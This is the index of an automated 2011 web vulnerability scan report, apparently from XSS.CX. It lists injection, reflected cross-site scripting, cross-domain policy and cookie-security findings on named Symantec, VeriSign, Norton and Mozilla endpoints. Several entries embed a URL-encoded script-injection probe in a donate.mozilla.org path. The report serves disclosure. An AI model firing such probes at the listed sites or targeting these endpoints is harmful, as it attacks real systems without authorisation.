XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09092011-01

Report generated by XSS.CX at Sat Sep 10 00:40:28 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search


1. LDAP injection

1.1. https://onlinefamily.norton.com/familysafety/basicpremium.fs [REST URL parameter 2]

1.2. http://player.ooyala.com/player.js [height parameter]

1.3. http://sales.liveperson.net/hc/2735064/ [PV%21pageLoadTime parameter]

1.4. http://sales.liveperson.net/hc/2735064/ [SV%21language parameter]

1.5. http://sales.liveperson.net/hc/2735064/ [defInvite parameter]

1.6. http://sales.liveperson.net/hc/2735064/ [lpCallId parameter]

1.7. http://sales.liveperson.net/hc/71097838/ [HumanClickACTIVE cookie]

1.8. http://sales.liveperson.net/hc/71097838/ [HumanClickSiteContainerID_71097838 cookie]

1.9. http://sales.liveperson.net/hc/71097838/ [lpCallId parameter]

1.10. http://sales.liveperson.net/hc/71097838/ [protV parameter]

1.11. http://sales.liveperson.net/hc/71097838/ [t parameter]

1.12. http://sales.liveperson.net/hc/71097838/ [timeout parameter]

2. HTTP header injection

2.1. https://idprotect.verisign.com/toolbar/activate.v [REST URL parameter 2]

2.2. https://idprotect.verisign.com/toolbar/download.v [REST URL parameter 2]

2.3. https://idprotect.verisign.com/toolbar/downloadIE.v [REST URL parameter 2]

2.4. https://idprotect.verisign.com/toolbar/home.v [REST URL parameter 2]

2.5. https://idprotect.verisign.com/toolbar/install.v [REST URL parameter 2]

3. Cross-site scripting (reflected)

3.1. https://cert.webtrust.org/ViewSeal [id parameter]

3.2. http://com-verisign.netmng.com/ [height parameter]

3.3. http://com-verisign.netmng.com/ [width parameter]

3.4. https://donate.mozilla.org/favicon.ico [REST URL parameter 1]

3.5. https://donate.mozilla.org/favicon.ico [name of an arbitrarily supplied request parameter]

3.6. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 1]

3.7. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 2]

3.8. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 3]

3.9. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 4]

3.10. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [name of an arbitrarily supplied request parameter]

3.11. https://fileconnect.symantec.com/licenselogin.jsp [localeStr parameter]

3.12. https://forms.verisign.com/websurveys/servlet/ActionMultiplexer [Action_ID parameter]

3.13. http://free.pctools.com/favicon.ico [REST URL parameter 1]

3.14. http://free.pctools.com/free-antivirus/ [REST URL parameter 1]

3.15. http://free.pctools.com/free-antivirus/ [name of an arbitrarily supplied request parameter]

3.16. https://idprotect.verisign.com/toolbar/activate.v [name of an arbitrarily supplied request parameter]

3.17. https://idprotect.verisign.com/toolbar/activate.v [name of an arbitrarily supplied request parameter]

3.18. https://idprotect.verisign.com/toolbar/download.v [name of an arbitrarily supplied request parameter]

3.19. https://idprotect.verisign.com/toolbar/home.v [name of an arbitrarily supplied request parameter]

3.20. https://idprotect.verisign.com/toolbar/install.v [name of an arbitrarily supplied request parameter]

3.21. http://mbox3.offermatica.com/m2/verisign/mbox/standard [mbox parameter]

3.22. http://player.ooyala.com/player.js [playerId parameter]

3.23. http://player.ooyala.com/player.js [wmode parameter]

3.24. https://press.verisign.com/easyir/customrel.do [name of an arbitrarily supplied request parameter]

3.25. https://renewals.symantec.com/renewals/application [entry_point parameter]

3.26. http://updatecenter.norton.com/ [NUCLANG parameter]

3.27. http://www.symantec.com/business/verisign/fraud-detection-service [tid parameter]

3.28. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 2]

3.29. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 3]

3.30. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 4]

3.31. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 5]

3.32. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 6]

3.33. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 7]

3.34. http://www.symantec.com/s/searchg/suggest [q parameter]

3.35. https://cert.webtrust.org/ViewSeal [Referer HTTP header]

4. Flash cross-domain policy

4.1. http://ak.c.ooyala.com/crossdomain.xml

4.2. http://cp76677.edgefcs.net/crossdomain.xml

4.3. http://mbox3.offermatica.com/crossdomain.xml

4.4. http://om.symantec.com/crossdomain.xml

4.5. http://player.ooyala.com/crossdomain.xml

4.6. https://symantec-corporation.com/crossdomain.xml

4.7. http://symantec.tt.omtrdc.net/crossdomain.xml

4.8. http://ch.norton.com/crossdomain.xml

4.9. http://l.player.ooyala.com/crossdomain.xml

4.10. http://us.norton.com/crossdomain.xml

4.11. https://us.norton.com/crossdomain.xml

4.12. https://www-secure.symantec.com/crossdomain.xml

4.13. http://www.symantec.com/crossdomain.xml

4.14. http://1168.ic-live.com/crossdomain.xml

4.15. https://drh.img.digitalriver.com/crossdomain.xml

4.16. http://twitter.com/crossdomain.xml

4.17. http://www.verisign.com/crossdomain.xml

4.18. https://www.verisign.com/crossdomain.xml

5. Silverlight cross-domain policy

5.1. http://om.symantec.com/clientaccesspolicy.xml

5.2. http://player.ooyala.com/clientaccesspolicy.xml

6. SSL cookie without secure flag set

6.1. https://admin.instantservice.com/Customer

6.2. https://admin.instantservice.com/links/5851/14753

6.3. https://admin.instantservice.com/links/5851/16144

6.4. https://admin.instantservice.com/links/5851/16145

6.5. https://admin.instantservice.com/links/5851/39897

6.6. https://onlinefamily.norton.com/familysafety/loginStart.fs

6.7. https://securitycenter.verisign.com/celp/enroll/outsideSearch

6.8. https://securitycenter.verisign.com/celp/enroll/retail

6.9. https://securitycenter.verisign.com/celp/enroll/upsell

6.10. https://onlinefamily.norton.com/familysafety/basicpremium.fs

6.11. https://renewals.symantec.com/renewals/application

6.12. https://ssl-certificate-center.verisign.ch/process/retail/console_login

6.13. https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial

6.14. https://ssl-certificate-center.verisign.com/process/retail/console_login

6.15. https://ssl-certificate-center.verisign.com/process/retail/production_trial_initial

6.16. https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial

6.17. https://trust-center.verisign.ch/process/retail/console_login

6.18. https://trust-center.verisign.ch/process/retail/trust_initial

6.19. https://trust-center.verisign.com/favicon.ico

6.20. https://trust-center.verisign.com/process/retail/console_login

6.21. https://trust-center.verisign.com/process/retail/help_and_support

6.22. https://trust-center.verisign.com/process/retail/redirect

6.23. https://trust-center.verisign.com/process/retail/session_timeout

6.24. https://trust-center.verisign.com/process/retail/trust_initial

6.25. https://trust-center.verisign.com/process/retail/trust_product_selector

6.26. https://trust-center.verisign.com/process/retail/trust_product_selector.do

6.27. https://trust-center.verisign.com/rcm/TeaLeafTarget.html

6.28. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_gray.gif

6.29. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_red.gif

6.30. https://trust-center.verisign.com/rcm/verisign/images/divider.gif

6.31. https://trust-center.verisign.com/rcm/verisign/images/ico_questionmark.gif

6.32. https://trust-center.verisign.com/rcm/verisign/images/logo.gif

6.33. https://trust-center.verisign.com/rcm/verisign/images/popup_button_left.gif

6.34. https://trust-center.verisign.com/rcm/verisign/images/popup_button_right.gif

6.35. https://trust-center.verisign.com/rcm/verisign/images/pricebox_bg.gif

6.36. https://trust-center.verisign.com/rcm/verisign/images/sm_004276_oo.gif

6.37. https://trust-center.verisign.com/rcm/verisign/images/truste.gif

6.38. https://trust-center.verisign.com/rcm/verisign/images/tsTermArrow.gif

6.39. https://trust-center.verisign.com/rcm/verisign/images/tsTermBgM.jpg

6.40. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtB.gif

6.41. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.gif

6.42. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.jpg

6.43. https://trust-center.verisign.com/rcm/verisign/images/webtrust.gif

6.44. https://trust-center.verisign.com/rcm/verisign/scripts/account_signin.js

6.45. https://trust-center.verisign.com/rcm/verisign/scripts/chat_support.js

6.46. https://trust-center.verisign.com/rcm/verisign/scripts/default.js

6.47. https://trust-center.verisign.com/rcm/verisign/scripts/oo_conf_en-US_inline.js

6.48. https://trust-center.verisign.com/rcm/verisign/scripts/oo_engine_c.js

6.49. https://trust-center.verisign.com/rcm/verisign/scripts/popup.js

6.50. https://trust-center.verisign.com/rcm/verisign/scripts/product_white_list.js

6.51. https://trust-center.verisign.com/rcm/verisign/scripts/quick_signin.js

6.52. https://trust-center.verisign.com/rcm/verisign/scripts/script_log.js

6.53. https://trust-center.verisign.com/rcm/verisign/scripts/src/dojo/dojo/dojo.js

6.54. https://trust-center.verisign.com/rcm/verisign/scripts/syscheck.js

6.55. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDK.js

6.56. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js

6.57. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_capture_payment.js

6.58. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_product_selector.js

6.59. https://trust-center.verisign.com/rcm/verisign/scripts/utility.js

6.60. https://trust-center.verisign.com/rcm/verisign/style/brand.css

6.61. https://trust-center.verisign.com/rcm/verisign/style/capture_payment.css

6.62. https://trust-center.verisign.com/rcm/verisign/style/minimal_form.css

6.63. https://trust-center.verisign.com/rcm/verisign/style/module.css

6.64. https://trust-center.verisign.com/rcm/verisign/style/product_selector.css

6.65. https://trust-center.verisign.com/rcm/verisign/style/vrsn.css

6.66. https://www.verisign.com/assets/visual-sciences/vip/zig.js

6.67. https://www4.symantec.com/Vrt/wl

7. Session token in URL

7.1. https://idprotect.verisign.com/images/favicon.ico

7.2. https://idprotect.verisign.com/kaptcha.jpg

7.3. https://idprotect.verisign.com/scripts/global.js

7.4. https://idprotect.verisign.com/toolbar/activate.v

7.5. http://m.verisign.com/home.v

7.6. http://mbox3.offermatica.com/m2/verisign/mbox/standard

7.7. http://mbox3.offermatica.com/m2/verisign/ubox/image

7.8. http://player.ooyala.com/sas/authorized

7.9. https://renewals.symantec.com/renewals/images/icon-pop-up.gif

7.10. http://sales.liveperson.net/hc/2735064/

7.11. https://securitycenter.verisign.com/celp/enroll/retail

7.12. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard

7.13. https://trust-center.verisign.com/process/retail/trust_product_selector

7.14. http://vipmobile.verisign.com/images/favicon.ico

7.15. https://vipmobile.verisign.com/home.v

8. SSL certificate

8.1. https://fileconnect.symantec.com/

8.2. https://forms.verisign.com/

8.3. https://knowledge.verisign.ch/

8.4. https://knowledge.verisign.com/

8.5. https://onlinefamily.norton.com/

8.6. https://query.verisign.com/

8.7. https://ssl-certificate-center.verisign.ch/

8.8. https://ssl-certificate-center.verisign.com/

8.9. https://trust-center.verisign.ch/

8.10. https://trust-center.verisign.com/

8.11. https://us.norton.com/

8.12. https://admin.instantservice.com/

8.13. https://buy-static.norton.com/

8.14. https://cdn.verisign.com/

8.15. https://cert.webtrust.org/

8.16. https://donate.mozilla.org/

8.17. https://drh.img.digitalriver.com/

8.18. https://enterprise-ssl-admin.verisign.com/

8.19. https://idprotect.verisign.com/

8.20. https://partnernet.symantec.com/

8.21. https://policy3.responsys.net/

8.22. https://press.verisign.com/

8.23. https://products.geotrust.com/

8.24. https://products.verisign.com/

8.25. https://renewals.symantec.com/

8.26. https://seal.verisign.com/

8.27. https://securitycenter.verisign.com/

8.28. https://symaccount.symantec.com/

8.29. https://symantec-corporation.com/

8.30. https://test-products.verisign.com/

8.31. https://vipdeveloper.verisign.com/

8.32. https://vipmanager.verisign.com/

8.33. https://vipmobile.verisign.com/

8.34. https://vs.symantec.com/

8.35. https://www-secure.symantec.com/

8.36. https://www.verisign.com/

8.37. https://www4.symantec.com/

9. Cookie scoped to parent domain

9.1. http://buy.norton.com/

9.2. http://buy.norton.com/estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/

9.3. http://buy.norton.com/estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/

9.4. http://buy.norton.com/estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/

9.5. http://buy.norton.com/estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/

9.6. http://buy.norton.com/estore/mf/landingProductFeatures

9.7. http://buy.norton.com/estore/mf/landingPromotion

9.8. http://buy.norton.com/estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/

9.9. http://buy.norton.com/estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/

9.10. http://buy.norton.com/estore/mf/upgradeCenter

9.11. http://buy.norton.com/estore/mf/upgradeRenewal

9.12. http://buy.norton.com/estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/

9.13. http://buy.norton.com/estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/

9.14. http://mbox3.offermatica.com/m2/verisign/mbox/standard

9.15. http://buy.norton.com/

9.16. http://buy.norton.com/ps

9.17. http://buy.norton.com/special-promotions

9.18. http://buy.norton.com/support

9.19. http://buy.norton.com/upgrades-renewals

9.20. http://buy.symanteccloud.com/freetrial

9.21. http://buy.symanteccloud.com/smbstore

9.22. http://free.pctools.com/res/js/utils.php

9.23. http://mbox3.offermatica.com/m2/verisign/mbox/standard

9.24. http://sales.liveperson.net/hc/2735064/

9.25. http://sales.liveperson.net/hc/71097838/

9.26. https://ssl-certificate-center.verisign.ch/process/retail/console_login

9.27. https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial

9.28. https://ssl-certificate-center.verisign.com/process/retail/console_login

9.29. https://ssl-certificate-center.verisign.com/process/retail/production_trial_initial

9.30. https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial

9.31. https://trust-center.verisign.ch/process/retail/console_login

9.32. https://trust-center.verisign.ch/process/retail/trust_initial

9.33. https://trust-center.verisign.com/favicon.ico

9.34. https://trust-center.verisign.com/process/retail/console_login

9.35. https://trust-center.verisign.com/process/retail/help_and_support

9.36. https://trust-center.verisign.com/process/retail/redirect

9.37. https://trust-center.verisign.com/process/retail/session_timeout

9.38. https://trust-center.verisign.com/process/retail/trust_initial

9.39. https://trust-center.verisign.com/process/retail/trust_product_selector

9.40. https://trust-center.verisign.com/process/retail/trust_product_selector.do

9.41. https://trust-center.verisign.com/rcm/TeaLeafTarget.html

9.42. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_gray.gif

9.43. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_red.gif

9.44. https://trust-center.verisign.com/rcm/verisign/images/divider.gif

9.45. https://trust-center.verisign.com/rcm/verisign/images/ico_questionmark.gif

9.46. https://trust-center.verisign.com/rcm/verisign/images/logo.gif

9.47. https://trust-center.verisign.com/rcm/verisign/images/popup_button_left.gif

9.48. https://trust-center.verisign.com/rcm/verisign/images/popup_button_right.gif

9.49. https://trust-center.verisign.com/rcm/verisign/images/pricebox_bg.gif

9.50. https://trust-center.verisign.com/rcm/verisign/images/sm_004276_oo.gif

9.51. https://trust-center.verisign.com/rcm/verisign/images/truste.gif

9.52. https://trust-center.verisign.com/rcm/verisign/images/tsTermArrow.gif

9.53. https://trust-center.verisign.com/rcm/verisign/images/tsTermBgM.jpg

9.54. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtB.gif

9.55. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.gif

9.56. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.jpg

9.57. https://trust-center.verisign.com/rcm/verisign/images/webtrust.gif

9.58. https://trust-center.verisign.com/rcm/verisign/scripts/account_signin.js

9.59. https://trust-center.verisign.com/rcm/verisign/scripts/chat_support.js

9.60. https://trust-center.verisign.com/rcm/verisign/scripts/default.js

9.61. https://trust-center.verisign.com/rcm/verisign/scripts/oo_conf_en-US_inline.js

9.62. https://trust-center.verisign.com/rcm/verisign/scripts/oo_engine_c.js

9.63. https://trust-center.verisign.com/rcm/verisign/scripts/popup.js

9.64. https://trust-center.verisign.com/rcm/verisign/scripts/product_white_list.js

9.65. https://trust-center.verisign.com/rcm/verisign/scripts/quick_signin.js

9.66. https://trust-center.verisign.com/rcm/verisign/scripts/script_log.js

9.67. https://trust-center.verisign.com/rcm/verisign/scripts/src/dojo/dojo/dojo.js

9.68. https://trust-center.verisign.com/rcm/verisign/scripts/syscheck.js

9.69. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDK.js

9.70. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js

9.71. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_capture_payment.js

9.72. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_product_selector.js

9.73. https://trust-center.verisign.com/rcm/verisign/scripts/utility.js

9.74. https://trust-center.verisign.com/rcm/verisign/style/brand.css

9.75. https://trust-center.verisign.com/rcm/verisign/style/capture_payment.css

9.76. https://trust-center.verisign.com/rcm/verisign/style/minimal_form.css

9.77. https://trust-center.verisign.com/rcm/verisign/style/module.css

9.78. https://trust-center.verisign.com/rcm/verisign/style/product_selector.css

9.79. https://trust-center.verisign.com/rcm/verisign/style/vrsn.css

9.80. http://www.verisign.ch/assets/shared/images/sm_004276_oo.gif

9.81. http://www.verisign.co.uk/hp07/i/vlogo.gif

9.82. https://www.verisign.com/assets/visual-sciences/vip/zig.js

10. Cookie without HttpOnly flag set

10.1. https://admin.instantservice.com/Customer

10.2. https://admin.instantservice.com/links/5851/14753

10.3. https://admin.instantservice.com/links/5851/16144

10.4. https://admin.instantservice.com/links/5851/16145

10.5. https://admin.instantservice.com/links/5851/39897

10.6. http://buy.norton.com/

10.7. http://buy.norton.com/estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/

10.8. http://buy.norton.com/estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/

10.9. http://buy.norton.com/estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/

10.10. http://buy.norton.com/estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/

10.11. http://buy.norton.com/estore/mf/landingProductFeatures

10.12. http://buy.norton.com/estore/mf/landingPromotion

10.13. http://buy.norton.com/estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/

10.14. http://buy.norton.com/estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/

10.15. http://buy.norton.com/estore/mf/upgradeCenter

10.16. http://buy.norton.com/estore/mf/upgradeRenewal

10.17. http://buy.norton.com/estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/

10.18. http://buy.norton.com/estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/

10.19. http://buy.norton.com/upgrades-renewals

10.20. https://idprotect.verisign.com/toolbar/activate.v

10.21. http://m.verisign.com/

10.22. http://mbox3.offermatica.com/m2/verisign/mbox/standard

10.23. https://onlinefamily.norton.com/familysafety/loginStart.fs

10.24. https://products.verisign.com/geocenter/reseller/doregister.do

10.25. https://products.verisign.com/geocenter/reseller/logon.do

10.26. https://products.verisign.com/geocenter/reseller/register.do

10.27. https://securitycenter.verisign.com/celp/enroll/outsideSearch

10.28. https://securitycenter.verisign.com/celp/enroll/retail

10.29. https://securitycenter.verisign.com/celp/enroll/upsell

10.30. https://trust-center.verisign.com/process/retail/session_timeout

10.31. http://us.norton.com/beta/index.jsp

10.32. http://us.norton.com/beta/overview.jsp

10.33. http://vipmobile.verisign.com/fpa/fpa.jsp

10.34. http://vipmobile.verisign.com/images/b_shadow.png

10.35. http://vipmobile.verisign.com/images/bl_shadow.png

10.36. http://vipmobile.verisign.com/images/br_shadow.png

10.37. http://vipmobile.verisign.com/images/dot.gif

10.38. http://vipmobile.verisign.com/images/home_rght_box.gif

10.39. http://vipmobile.verisign.com/images/r_shadow.png

10.40. http://vipmobile.verisign.com/images/rt_shadow.png

10.41. http://vipmobile.verisign.com/images/topleft.gif

10.42. https://vipmobile.verisign.com/fpa/fpa.jsp

10.43. http://buy.norton.com/

10.44. http://buy.norton.com/ps

10.45. http://buy.norton.com/special-promotions

10.46. http://buy.norton.com/support

10.47. http://buy.symanteccloud.com/freetrial

10.48. http://buy.symanteccloud.com/smbstore

10.49. http://com-verisign.netmng.com/

10.50. http://com-verisign.netmng.com//

10.51. http://free.pctools.com/res/js/utils.php

10.52. http://mbox3.offermatica.com/m2/verisign/mbox/standard

10.53. https://onlinefamily.norton.com/familysafety/basicpremium.fs

10.54. http://renewals.symantec.com/renewals/application

10.55. https://renewals.symantec.com/renewals/application

10.56. http://sales.liveperson.net/hc/2735064/

10.57. http://sales.liveperson.net/hc/2735064/

10.58. http://sales.liveperson.net/hc/2735064/

10.59. http://sales.liveperson.net/hc/71097838/

10.60. http://sales.liveperson.net/hc/71097838/

10.61. http://sales.liveperson.net/hc/71097838/

10.62. https://ssl-certificate-center.verisign.ch/process/retail/console_login

10.63. https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial

10.64. https://ssl-certificate-center.verisign.com/process/retail/console_login

10.65. https://ssl-certificate-center.verisign.com/process/retail/production_trial_initial

10.66. https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial

10.67. https://trust-center.verisign.ch/process/retail/console_login

10.68. https://trust-center.verisign.ch/process/retail/trust_initial

10.69. https://trust-center.verisign.com/favicon.ico

10.70. https://trust-center.verisign.com/process/retail/console_login

10.71. https://trust-center.verisign.com/process/retail/help_and_support

10.72. https://trust-center.verisign.com/process/retail/redirect

10.73. https://trust-center.verisign.com/process/retail/trust_initial

10.74. https://trust-center.verisign.com/process/retail/trust_product_selector

10.75. https://trust-center.verisign.com/process/retail/trust_product_selector.do

10.76. https://trust-center.verisign.com/rcm/TeaLeafTarget.html

10.77. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_gray.gif

10.78. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_red.gif

10.79. https://trust-center.verisign.com/rcm/verisign/images/divider.gif

10.80. https://trust-center.verisign.com/rcm/verisign/images/ico_questionmark.gif

10.81. https://trust-center.verisign.com/rcm/verisign/images/logo.gif

10.82. https://trust-center.verisign.com/rcm/verisign/images/popup_button_left.gif

10.83. https://trust-center.verisign.com/rcm/verisign/images/popup_button_right.gif

10.84. https://trust-center.verisign.com/rcm/verisign/images/pricebox_bg.gif

10.85. https://trust-center.verisign.com/rcm/verisign/images/sm_004276_oo.gif

10.86. https://trust-center.verisign.com/rcm/verisign/images/truste.gif

10.87. https://trust-center.verisign.com/rcm/verisign/images/tsTermArrow.gif

10.88. https://trust-center.verisign.com/rcm/verisign/images/tsTermBgM.jpg

10.89. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtB.gif

10.90. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.gif

10.91. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.jpg

10.92. https://trust-center.verisign.com/rcm/verisign/images/webtrust.gif

10.93. https://trust-center.verisign.com/rcm/verisign/scripts/account_signin.js

10.94. https://trust-center.verisign.com/rcm/verisign/scripts/chat_support.js

10.95. https://trust-center.verisign.com/rcm/verisign/scripts/default.js

10.96. https://trust-center.verisign.com/rcm/verisign/scripts/oo_conf_en-US_inline.js

10.97. https://trust-center.verisign.com/rcm/verisign/scripts/oo_engine_c.js

10.98. https://trust-center.verisign.com/rcm/verisign/scripts/popup.js

10.99. https://trust-center.verisign.com/rcm/verisign/scripts/product_white_list.js

10.100. https://trust-center.verisign.com/rcm/verisign/scripts/quick_signin.js

10.101. https://trust-center.verisign.com/rcm/verisign/scripts/script_log.js

10.102. https://trust-center.verisign.com/rcm/verisign/scripts/src/dojo/dojo/dojo.js

10.103. https://trust-center.verisign.com/rcm/verisign/scripts/syscheck.js

10.104. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDK.js

10.105. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js

10.106. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_capture_payment.js

10.107. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_product_selector.js

10.108. https://trust-center.verisign.com/rcm/verisign/scripts/utility.js

10.109. https://trust-center.verisign.com/rcm/verisign/style/brand.css

10.110. https://trust-center.verisign.com/rcm/verisign/style/capture_payment.css

10.111. https://trust-center.verisign.com/rcm/verisign/style/minimal_form.css

10.112. https://trust-center.verisign.com/rcm/verisign/style/module.css

10.113. https://trust-center.verisign.com/rcm/verisign/style/product_selector.css

10.114. https://trust-center.verisign.com/rcm/verisign/style/vrsn.css

10.115. http://www.verisign.ch/assets/shared/images/sm_004276_oo.gif

10.116. http://www.verisign.co.uk/hp07/i/vlogo.gif

10.117. https://www.verisign.com/assets/visual-sciences/vip/zig.js

10.118. https://www4.symantec.com/Vrt/wl

11. Password field with autocomplete enabled

11.1. http://blogs.verisign.com/

11.2. https://knowledge.verisign.ch/support/code-signing-support/index.html

11.3. https://knowledge.verisign.ch/support/digital-id-support/index.html

11.4. https://knowledge.verisign.ch/support/mpki-support/index.html

11.5. https://knowledge.verisign.ch/support/ssl-certificates-support/index

11.6. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html

11.7. https://knowledge.verisign.ch/support/trust-seal-support/index.html

11.8. https://knowledge.verisign.com/support/code-signing-support/index

11.9. https://knowledge.verisign.com/support/code-signing-support/index.html

11.10. https://knowledge.verisign.com/support/digital-id-support/index.html

11.11. https://knowledge.verisign.com/support/eca-support/index.html

11.12. https://knowledge.verisign.com/support/mpki-for-ssl-support/index

11.13. https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html

11.14. https://knowledge.verisign.com/support/mpki-support/index.html

11.15. https://knowledge.verisign.com/support/ssl-certificates-support/index

11.16. https://knowledge.verisign.com/support/ssl-certificates-support/index.html

11.17. https://knowledge.verisign.com/support/trust-seal-support/index.html

11.18. https://products.verisign.com/geocenter/reseller/logon.do

11.19. https://products.verisign.com/geocenter/reseller/logon.jsp

11.20. https://products.verisign.com/geocenter/reseller/register.do

11.21. http://query.verisign.ch/search

11.22. http://query.verisign.com/search

11.23. https://query.verisign.com/search

11.24. https://ssl-certificate-center.verisign.ch/process/retail/console_login

11.25. https://ssl-certificate-center.verisign.com/process/retail/console_login

11.26. https://test-products.verisign.com/geocenter/reseller/logon.do

11.27. https://trust-center.verisign.ch/process/retail/console_login

11.28. https://trust-center.verisign.com/process/retail/console_login

11.29. http://www.verisign.ch/

11.30. http://www.verisign.ch/contact-information/index.html

11.31. http://www.verisign.ch/corporate/index.html

11.32. http://www.verisign.ch/trust-seal/index.html

11.33. http://www.verisign.com/

11.34. http://www.verisign.com/assets/trust-seal/images/FreeTrialButton-hover.png,/assets/trust-seal/images/BuyButton-hover.png,/assets/trust-seal/images/omer-png8.png,/assets/trust-seal/images/hadleigh-png8.png,/assets/trust-seal/images/diane-png8.png,/assets/trust-seal/images/matthew-png8.png

11.35. http://www.verisign.com/code-signing/index.html

11.36. http://www.verisign.com/partners/ssl-reseller-programs/index.html

11.37. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html

11.38. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html

11.39. http://www.verisign.com/ssl/buy-ssl-certificates/index.html

11.40. http://www.verisign.com/trust-seal/index.html

11.41. http://www.verisign.com/verisign-worldwide/index.html

11.42. https://www.verisign.com/

11.43. https://www.verisign.com/products-services/index.html

12. Referer-dependent response

12.1. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/arrow_red.png

12.2. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/arrow_white.png

12.3. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_grad.png

12.4. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_grad.png,/authweb/global/assets/shared/images/nav/nav_left.png,/authweb/global/assets/shared/images/nav/nav_right.png,/authweb/global/assets/shared/images/nav/arrow_red.png,/authweb/global/assets/shared/images/nav/arrow_white.png

12.5. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_left.png

12.6. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_right.png

12.7. http://sales.liveperson.net/hc/2735064/

13. Cross-domain POST

13.1. https://knowledge.verisign.ch/support/code-signing-support/index.html

